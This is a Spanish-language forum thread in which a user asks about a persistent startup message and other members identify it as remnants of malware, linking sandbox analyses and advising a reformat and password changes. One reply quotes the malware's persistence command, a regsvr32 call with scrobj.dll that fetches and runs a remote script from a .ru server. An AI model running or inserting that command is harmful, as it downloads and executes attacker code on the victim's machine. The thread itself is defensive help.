Cita de: #!drvy en 16 Septiembre 2018, 00:41 AM
Por la url en el titulo, me da que es malware.
Creo que ya sabes que hacer.
PD: La url completa deberia ser http://server2.39slxu3bw.ru/restore.xml, por lo visto ese archivo ya no existe o no se muestra (de ahí que salte el error de que no hay componentes [en el archivo XML]). Tal y como lo veo, parece ser una botnet olvidada o suspendida.
PD2: Investigando un poco más, puedes encontrar analisis que han hecho otros:
https://www.reverse.it/sample/0f65931cb369b3c9edee1fe66224bf98cc63b69c2f2c9113329c1f03519885dd?environmentId=100
https://www.virustotal.com/es/file/198dbf18747c4592fcce43c3b1c45f9706f9c3fb781e8ac9f23f0c2418caa5ca/analysis/1507063666/
En especial, te interesa esto:Código [Seleccionar]%WINDIR%\system32\regsvr32.exe /s /n /u /i:http://server2.39slxu3bw.ru/restore.xml scrobj.dll"
Saludos
Ya yo sabia que eran los restos de un bicho... la cosa es quería eliminar el mensajito al inicio y no hallo como... grrrr...
Y si... aquí ya no hay nada...
Cita de: OmarHack en 16 Septiembre 2018, 01:04 AM
Es malware lamer te roba información personal y lo incluye en bases de datos.
Tiene control absoluto sobre el sistema para hacer lo que le de la gana.
Yo en tu caso, formateria el disco duro, revisaría la seguridad de la red para ver que no ha sido comprometida, y cambiaría claves de todas las cuentas y correos de todos los servicios a los que tengas acceso.
Por qué debes hacer esto si no ha pasado nada?
Porque tus datos puede que estén ahora mismo rondando por la web esperando a ser encontrados.
Bueno amigo... este PC esta recen formateado y yo no le pongo ningún antivirus salvo el que trae por defecto Windows Defender...
El disco esta particionado y en el respaldo tengo muchos programas y otras cosas pero no hay infección alguna... lo único es que le meto muchos pendrives que me traen de oficinas publicas para cargarles películas y música y la mayoría de las veces me toca limpiarlos y librarlos de bichos... pero nunca me habia pasado esto de ese bendito cartel que es lo que me molesta y no he podido eliminar...
Aquí tampoco me sale nada que pueda eliminar del inicio... grrrrrr...
Puedo formatear nuevamente... pero sera mejor saber como eliminar esa basura...
Saludos, y gracias por su tiempo y atención...